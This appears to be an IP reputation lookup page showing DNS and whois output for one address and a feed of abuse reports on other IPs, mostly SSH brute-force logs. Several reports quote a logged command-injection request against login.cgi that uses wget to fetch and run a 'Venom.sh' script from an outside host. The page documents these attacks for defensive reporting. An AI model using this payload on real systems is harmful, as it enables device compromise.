Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: None

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 119.82.245.49
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 4158
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;119.82.245.49.			IN	A

;; AUTHORITY SECTION:
.			464	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022030800 1800 900 604800 86400

;; Query time: 65 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Mar 08 19:03:52 CST 2022
;; MSG SIZE  rcvd: 106
Host info
49.245.82.119.in-addr.arpa domain name pointer ip-245-49.datautama.net.id.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
49.245.82.119.in-addr.arpa	name = ip-245-49.datautama.net.id.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
41.44.80.11 attackbotsspam
1 attack on wget probes like:
41.44.80.11 - - [22/Dec/2019:18:49:47 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 21:01:59
182.61.105.104 attack
Dec 23 13:31:23 tux-35-217 sshd\[32529\]: Invalid user server from 182.61.105.104 port 58220
Dec 23 13:31:23 tux-35-217 sshd\[32529\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=182.61.105.104
Dec 23 13:31:25 tux-35-217 sshd\[32529\]: Failed password for invalid user server from 182.61.105.104 port 58220 ssh2
Dec 23 13:37:02 tux-35-217 sshd\[32555\]: Invalid user khawar from 182.61.105.104 port 35658
Dec 23 13:37:02 tux-35-217 sshd\[32555\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=182.61.105.104
...
2019-12-23 21:16:12
128.199.106.169 attackbots
Invalid user admin from 128.199.106.169 port 43196
2019-12-23 21:27:13
207.154.234.102 attackspambots
Dec 23 14:12:54 ns382633 sshd\[23212\]: Invalid user blinnie from 207.154.234.102 port 54746
Dec 23 14:12:54 ns382633 sshd\[23212\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=207.154.234.102
Dec 23 14:12:56 ns382633 sshd\[23212\]: Failed password for invalid user blinnie from 207.154.234.102 port 54746 ssh2
Dec 23 14:24:57 ns382633 sshd\[25132\]: Invalid user admin from 207.154.234.102 port 51028
Dec 23 14:24:57 ns382633 sshd\[25132\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=207.154.234.102
2019-12-23 21:31:52
156.200.194.53 attack
1 attack on wget probes like:
156.200.194.53 - - [22/Dec/2019:20:48:35 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 21:17:48
197.34.200.86 attackspam
1 attack on wget probes like:
197.34.200.86 - - [22/Dec/2019:16:01:37 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 21:12:35
79.137.72.171 attackbots
Dec 23 16:35:35 areeb-Workstation sshd[12839]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=79.137.72.171 
Dec 23 16:35:37 areeb-Workstation sshd[12839]: Failed password for invalid user boony from 79.137.72.171 port 34010 ssh2
...
2019-12-23 21:21:59
119.55.48.239 attackbotsspam
firewall-block, port(s): 23/tcp
2019-12-23 20:57:32
156.196.181.71 attack
wget call in url
2019-12-23 21:23:16
51.38.71.174 attackbots
$f2bV_matches
2019-12-23 21:13:23
46.33.225.84 attackbots
Dec 23 00:19:12 server sshd\[9883\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=ppp-46-33-225-84.wildpark.net  user=root
Dec 23 00:19:13 server sshd\[9883\]: Failed password for root from 46.33.225.84 port 57442 ssh2
Dec 23 15:32:38 server sshd\[1899\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=ppp-46-33-225-84.wildpark.net  user=root
Dec 23 15:32:40 server sshd\[1899\]: Failed password for root from 46.33.225.84 port 42636 ssh2
Dec 23 15:44:13 server sshd\[4850\]: Invalid user tomte1 from 46.33.225.84
Dec 23 15:44:13 server sshd\[4850\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=ppp-46-33-225-84.wildpark.net 
...
2019-12-23 21:20:18
186.130.73.151 attackspam
DATE:2019-12-23 07:24:39, IP:186.130.73.151, PORT:telnet Telnet brute force auth on honeypot server (honey-neo-dc)
2019-12-23 21:28:09
41.232.25.119 attackbotsspam
1 attack on wget probes like:
41.232.25.119 - - [22/Dec/2019:14:46:13 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 21:07:10
156.202.132.219 attackspambots
1 attack on wget probes like:
156.202.132.219 - - [23/Dec/2019:00:41:07 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 21:30:53
46.105.31.249 attackspam
Dec 23 18:49:42 areeb-Workstation sshd[19118]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=46.105.31.249 
Dec 23 18:49:44 areeb-Workstation sshd[19118]: Failed password for invalid user ftpuser from 46.105.31.249 port 60180 ssh2
...
2019-12-23 21:39:12

Recently Reported IPs

119.82.245.217 119.82.245.250 117.194.218.15 119.82.245.62
119.82.245.98 119.82.249.202 119.82.25.182 119.82.25.181
119.82.245.90 119.82.25.215 119.82.250.173 119.82.250.184
119.82.250.237 119.82.245.86 117.194.219.157 119.82.245.57
119.82.251.134 119.82.252.1 119.82.251.6 119.82.252.113